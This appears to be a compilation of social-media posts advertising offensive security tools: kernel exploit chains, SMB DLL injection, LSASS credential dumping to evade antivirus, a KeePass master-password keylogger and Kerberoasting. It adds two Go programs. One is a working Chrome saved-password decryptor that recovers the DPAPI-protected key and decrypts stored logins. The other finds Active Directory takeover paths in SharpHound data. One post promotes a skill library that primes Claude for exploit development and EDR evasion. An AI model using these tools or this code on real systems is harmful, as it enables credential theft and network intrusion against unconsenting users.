I have been extremely fortunate this year. To have met one of the best teammates I've ever worked with, who also spent a lot of time with me teaching me, challenging me, and answering questions, regardless of how dumb, over the holidays. I have no idea how to show how grateful I am.
Wormable RCE in Windows DNS. Wormable RCE in SMBv3. Linux kernel exploitation via eBPF and io_uring. Windows 11 kernel LPE. Android kernel exploitation bypassing DAC, SELinux, and Knox.
Full exploit chains with working PoCs. Heap grooming. ASLR bypass. CFG bypass. Type confusion. Kernel privilege escalation across three operating systems.
All free. All published with full writeups.
https://t.co/txZSShQlnW
Author: @chompie1337
#ExploitDevelopment #ReverseEngineering #InfoSec
Staged DLL Injection via SMB
This is a custom tool that performs staged DLL injection over SMB.
How it works:
• It attaches to a trusted remote process.exe.
• Allocates memory inside the target process.
• Stages the shellcode directly into that allocated memory remotely via SMB.
• Creates a thread to execute the shellcode.
This code is provided solely for educational and research purposes.
GitHub: https://t.co/itRoPeVWEr
Wrote a blogpost about how you can use the Windows server 2003 source code as a red teamer to make your tools look less like tools.
I also go over and map out the main/important files and practical examples of using it to augment MS-*/RFC specs: https://t.co/HfUYBAdCJJ
goLoL - a Windows host scanner that finds LOLBAS binaries present on the current machine and lists techniques you can run at your current privilege level with MITRE ATT&CK mappings and example commands https://t.co/0CIRynqovI
RT0x01 Red Teaming Initial Access : https://t.co/riBagVAvD9 highlighted why phishing attacks are still #1, and also why bug bounty hunters become beasts when it comes to Exploit Public-Facing Application and chaining them to get into the system. btw, can't cover all
New Windows privilege-escalation primitive just dropped.
GreenPlasma is a minimal PoC that forces creation of an arbitrary section object inside any directory writable by SYSTEM via CTFMON’s named-object cache.
Let me break it down for you:
shipping: WinSSHound
maps SSH access in AD as BloodHound paths. because Windows OpenSSH cheerfully ignores your "Deny Logon" GPOs (pre-2025) and on a default sshd_config every Authenticated User in the domain can walk right in. Why? Because Microsoft.
https://t.co/ONXuguz7r3
net_use - a modernized BOF ported from @TrustedSec's SA BOF repo. It is used to add, list, or remove mapped drives via the Windows MPR API. OG functionality is preserved; just added improved memory handling to reduce crashes during runtime.
In monitored environments, spawning net.exe or PowerShell for drive mapping can create unnecessary telemetry.
find it here:
https://t.co/fTezAomOi1
there seems to be some fun debate about Edge and its storing all the passwords in RAM in clear text, vs Chrome which stores the passwords upon use (e.g. one at a time) in RAM....
but Chrome also stores the passwords in an SQLite file and the keys are protected by DPAPI!
Guess what a userland process can do?
It can get the keys! It can decrypt! Now you might be thinking... that's not true.... so let's see: to D LAB!
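The point of the post above is that the DPAPI-wrapped key sitting in Chrome's "Local State" file is recoverable by any process running as the same user, after which the per-entry blobs in the "Login Data" SQLite database are plain AES-256-GCM. The Go program below is an added example written for this page, not code from the post's author or from any of the tools mentioned. It parses the `os_crypt.encrypted_key` field, strips the `DPAPI` prefix, and decrypts a "v10" blob; the CryptUnprotectData step is injected as a function (`unprotect`) so the code runs off-Windows, and the Local State document and key are constructed sample data. It also refuses "v20" blobs, which Chrome's App-Bound Encryption (Chrome 127 and later) protects with an additional wrap that DPAPI alone does not undo.

```go
package main

import (
	"crypto/aes"
	"crypto/cipher"
	"crypto/rand"
	"encoding/base64"
	"encoding/json"
	"errors"
	"fmt"
)

// localStateKey pulls os_crypt.encrypted_key out of Chrome's "Local State"
// file, base64-decodes it and strips the 5-byte "DPAPI" prefix. What remains
// is a CryptProtectData blob that the same user on the same machine can unwrap,
// which is why any userland process running as that user can recover the key.
// unprotect is injected: on Windows wire it to CryptUnprotectData; the demo
// passes an identity function so this compiles and runs anywhere.
func localStateKey(localState []byte, unprotect func([]byte) ([]byte, error)) ([]byte, error) {
	var ls struct {
		OsCrypt struct {
			EncryptedKey string `json:"encrypted_key"`
		} `json:"os_crypt"`
	}
	if err := json.Unmarshal(localState, &ls); err != nil {
		return nil, fmt.Errorf("parse Local State: %w", err)
	}
	raw, err := base64.StdEncoding.DecodeString(ls.OsCrypt.EncryptedKey)
	if err != nil {
		return nil, fmt.Errorf("decode encrypted_key: %w", err)
	}
	if len(raw) < 5 || string(raw[:5]) != "DPAPI" {
		return nil, errors.New("encrypted_key lacks the DPAPI prefix")
	}
	key, err := unprotect(raw[5:])
	if err != nil {
		return nil, fmt.Errorf("DPAPI unprotect: %w", err)
	}
	if len(key) != 32 {
		return nil, fmt.Errorf("expected a 32-byte AES key, got %d bytes", len(key))
	}
	return key, nil
}

// decryptLoginBlob decrypts one password_value cell from "Login Data".
// Layout: "v10" || 12-byte nonce || AES-256-GCM ciphertext with 16-byte tag.
// "v20" means App-Bound Encryption (Chrome 127+): the key is wrapped once more
// by Chrome's elevation service, so the DPAPI-unwrapped key is not sufficient.
func decryptLoginBlob(key, blob []byte) (string, error) {
	const prefixLen, nonceLen, tagLen = 3, 12, 16
	if len(blob) < prefixLen+nonceLen+tagLen {
		return "", errors.New("blob too short")
	}
	switch string(blob[:prefixLen]) {
	case "v10":
	case "v20":
		return "", errors.New("v20 app-bound blob: needs the elevation-service unwrap, not just DPAPI")
	default:
		return "", fmt.Errorf("unknown blob prefix %q", blob[:prefixLen])
	}
	block, err := aes.NewCipher(key)
	if err != nil {
		return "", err
	}
	gcm, err := cipher.NewGCM(block)
	if err != nil {
		return "", err
	}
	nonce := blob[prefixLen : prefixLen+nonceLen]
	pt, err := gcm.Open(nil, nonce, blob[prefixLen+nonceLen:], nil)
	if err != nil {
		return "", fmt.Errorf("GCM open failed (wrong key or tampered blob): %w", err)
	}
	return string(pt), nil
}

// encryptLoginBlob produces a v10 blob the way Chrome does. It exists only to
// construct sample input; a real run reads blobs out of the Login Data database.
func encryptLoginBlob(key []byte, password string) ([]byte, error) {
	block, err := aes.NewCipher(key)
	if err != nil {
		return nil, err
	}
	gcm, err := cipher.NewGCM(block)
	if err != nil {
		return nil, err
	}
	nonce := make([]byte, gcm.NonceSize())
	if _, err := rand.Read(nonce); err != nil {
		return nil, err
	}
	out := append([]byte("v10"), nonce...)
	return gcm.Seal(out, nonce, []byte(password), nil), nil
}

// sampleLocalState builds a constructed Local State document. The "DPAPI"
// payload is the bare key because the demo's unprotect function is identity.
func sampleLocalState(key []byte) []byte {
	enc := base64.StdEncoding.EncodeToString(append([]byte("DPAPI"), key...))
	return []byte(fmt.Sprintf(`{"os_crypt":{"encrypted_key":%q}}`, enc))
}

func main() {
	key := make([]byte, 32) // constructed demo key; Chrome's is random
	for i := range key {
		key[i] = byte(i)
	}
	identity := func(b []byte) ([]byte, error) { return b, nil }
	k, err := localStateKey(sampleLocalState(key), identity)
	if err != nil {
		panic(err)
	}
	blob, _ := encryptLoginBlob(k, "hunter2")
	pw, err := decryptLoginBlob(k, blob)
	fmt.Printf("recovered: %q err=%v\n", pw, err)
}
```

On a real Windows host the only change is replacing `identity` with a call to CryptUnprotectData in the user's context; the SQLite read is left out here since the blob format, not the database access, is the point.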
morphkatz - Polymorphic PE rewriter for Windows x64 , rewrites binaries into semantically identical but byte-different variants https://t.co/FvYcpCVSqF
DeadMatter
Extracts LSASS credentials from memory dumps. Lightweight. Can be used to bypass AV/EDR. Usually paired with DumpIt, as neither of them needs a GUI.
Tested with Microsoft Defender and Kaspersky
https://t.co/phV5wNPfBZ
@three_cube @_aircorridor #edr #apt #redteam
Targeted Kerberoasting with NetExec🔥
If you have Write privileges over a user, you can temporarily add an SPN to your target user, request the service ticket, and then remove the SPN. Voilà: a crackable hash without interfering with potentially critical users. Made by @azoxlpf🚀
claude-red is a curated library of offensive security skills designed for the Claude skills system. Each skill is a structured SKILL.md file that primes Claude with expert-level methodology for a specific attack surface, from SQLi to shellcode, EDR evasion to exploit development.
Resource: https://t.co/0XvEqoqPfv
A Rust dev just killed Headless Chrome.
It's called Obscura. The open-source headless browser purpose-built for AI agents and scrapers at scale.
Chrome vs Obscura:
- Memory: 200MB+ → 30MB
- Binary: 300MB+ → 70MB
- Page load: 500ms → 85ms
- Startup: 2s → Instant
- Anti-detect: None → Built-in
Single binary. No Node, no Chrome, no dependencies.
Stealth mode is brutal:
→ Per-session fingerprint randomization (GPU, canvas, audio, battery)
→ 3,520 tracker domains blocked by default
→ navigator.webdriver masked to match real Chrome
→ Native function masking so detectors can't sniff it out
Drop-in replacement for Puppeteer and Playwright over CDP. Zero code changes.
If you run agents or serious scraping at scale, this repo prints money.
100% open source.
If you like BloodHound and AD Hacking let me introduce you to BloodBash
No web front end
No neo4j
No complexity
Collect your AD artifacts with Sharphound
Run `BloodBash ./pathToSharphoundOutput`
That's it!
https://t.co/9b6EBfeiVP
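BloodBash's pitch above is that SharpHound output can be walked for attack paths without a web front end or neo4j. The Go program below is an added example for this page, not BloodBash's code, showing the core of that idea: parse the `data[].Aces` entries from a SharpHound JSON file (the field names `ObjectIdentifier`, `Properties.name`, `Aces[].PrincipalSID`, `Aces[].RightName` and `Aces[].IsInherited` are assumed from the SharpHound format; the `users.json` content is constructed sample data), keep only rights that give control over the target, and breadth-first search for a path from one principal to another.

```go
package main

import (
	"encoding/json"
	"fmt"
	"strings"
)

// Edge is one control relationship: Principal holds Right over Target.
type Edge struct {
	Principal, Right, Target string
}

// shObject mirrors only the SharpHound JSON fields used here (assumed layout).
type shObject struct {
	ObjectIdentifier string `json:"ObjectIdentifier"`
	Properties       struct {
		Name string `json:"name"`
	} `json:"Properties"`
	Aces []struct {
		PrincipalSID  string `json:"PrincipalSID"`
		PrincipalType string `json:"PrincipalType"`
		RightName     string `json:"RightName"`
		IsInherited   bool   `json:"IsInherited"`
	} `json:"Aces"`
}

// abusableRights are the ACE rights that translate into a takeover primitive
// (full control, DACL/owner rewrite, password reset, extended rights).
var abusableRights = map[string]bool{
	"GenericAll": true, "GenericWrite": true, "WriteDacl": true, "WriteOwner": true,
	"ForceChangePassword": true, "AllExtendedRights": true, "Owns": true,
}

// loadEdges parses SharpHound collection files, builds a SID->name map from
// every object seen, and emits the abusable ACEs as named edges.
func loadEdges(files ...[]byte) ([]Edge, error) {
	var objs []shObject
	for _, f := range files {
		var doc struct {
			Data []shObject `json:"data"`
		}
		if err := json.Unmarshal(f, &doc); err != nil {
			return nil, err
		}
		objs = append(objs, doc.Data...)
	}
	names := map[string]string{}
	for _, o := range objs {
		names[o.ObjectIdentifier] = strings.ToUpper(o.Properties.Name)
	}
	resolve := func(sid string) string {
		if n, ok := names[sid]; ok {
			return n
		}
		return sid // principal not in the collection; keep the raw SID
	}
	var edges []Edge
	for _, o := range objs {
		for _, a := range o.Aces {
			if abusableRights[a.RightName] {
				edges = append(edges, Edge{resolve(a.PrincipalSID), a.RightName, resolve(o.ObjectIdentifier)})
			}
		}
	}
	return edges, nil
}

// findPath runs a breadth-first search from start to goal over the edges and
// returns the hops as [principal, right, principal, right, ...], or nil.
func findPath(edges []Edge, start, goal string) []string {
	start, goal = strings.ToUpper(start), strings.ToUpper(goal)
	adj := map[string][]Edge{}
	for _, e := range edges {
		adj[e.Principal] = append(adj[e.Principal], e)
	}
	prev := map[string]Edge{}
	seen := map[string]bool{start: true}
	queue := []string{start}
	for len(queue) > 0 {
		cur := queue[0]
		queue = queue[1:]
		if cur == goal {
			var path []string
			for n := goal; n != start; n = prev[n].Principal {
				path = append([]string{prev[n].Right, n}, path...)
			}
			return append([]string{start}, path...)
		}
		for _, e := range adj[cur] {
			if !seen[e.Target] {
				seen[e.Target] = true
				prev[e.Target] = e
				queue = append(queue, e.Target)
			}
		}
	}
	return nil
}

// sampleUsersJSON is a constructed users.json: ALICE has GenericAll over the
// SVC_BACKUP account, which can reset DA_ADMIN's password. The inherited
// ReadProperty ACE is noise and must be filtered out.
const sampleUsersJSON = `{"data":[
 {"ObjectIdentifier":"S-1-5-21-1-2-3-1104","Properties":{"name":"ALICE@CORP.LOCAL"},"Aces":[]},
 {"ObjectIdentifier":"S-1-5-21-1-2-3-1105","Properties":{"name":"SVC_BACKUP@CORP.LOCAL"},
  "Aces":[{"PrincipalSID":"S-1-5-21-1-2-3-1104","PrincipalType":"User","RightName":"GenericAll","IsInherited":false},
          {"PrincipalSID":"S-1-5-21-1-2-3-513","PrincipalType":"Group","RightName":"ReadProperty","IsInherited":true}]},
 {"ObjectIdentifier":"S-1-5-21-1-2-3-500","Properties":{"name":"DA_ADMIN@CORP.LOCAL"},
  "Aces":[{"PrincipalSID":"S-1-5-21-1-2-3-1105","PrincipalType":"User","RightName":"ForceChangePassword","IsInherited":false}]}
],"meta":{"type":"users","count":3,"version":5}}`

func main() {
	edges, err := loadEdges([]byte(sampleUsersJSON))
	if err != nil {
		panic(err)
	}
	for _, e := range edges {
		fmt.Printf("%s -[%s]-> %s\n", e.Principal, e.Right, e.Target)
	}
	fmt.Println(strings.Join(findPath(edges, "alice@corp.local", "DA_ADMIN@CORP.LOCAL"), " -> "))
}
```

Group membership (`MemberOf`) edges, which real BloodHound paths lean on heavily, are deliberately left out to keep the example to the ACE handling; adding them means emitting a `MemberOf` edge per group entry in groups.json and letting the same BFS cross it.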
KeeLog
Async BOF that captures the KeePass master password by monitoring for the unlock prompt window. When a locked KeePass database is detected, a low-level keyboard hook is installed and keystrokes are captured until the prompt window disappears by being submitted, cancelled or closed. The captured buffer is then returned to the operator and automatically reconstructed into the master password.
https://t.co/wKuVoCU0h1
#redteam
How well do you really understand what's happening inside a #Kerberos exchange? In our latest blog, @codewhisperer84 breaks down the full authentication flow and demonstrates how to interact with every stage using the #Titanis toolset. Read it now! https://t.co/QfvnCt9C0T
Fresh research from the team (@vkamluk / @juanandres_gs) - this one goes back quite a while!
fast16 | Mystery ShadowBrokers Reference Reveals High-Precision Software Sabotage 5 Years Before Stuxnet
https://t.co/cR83vHEzWo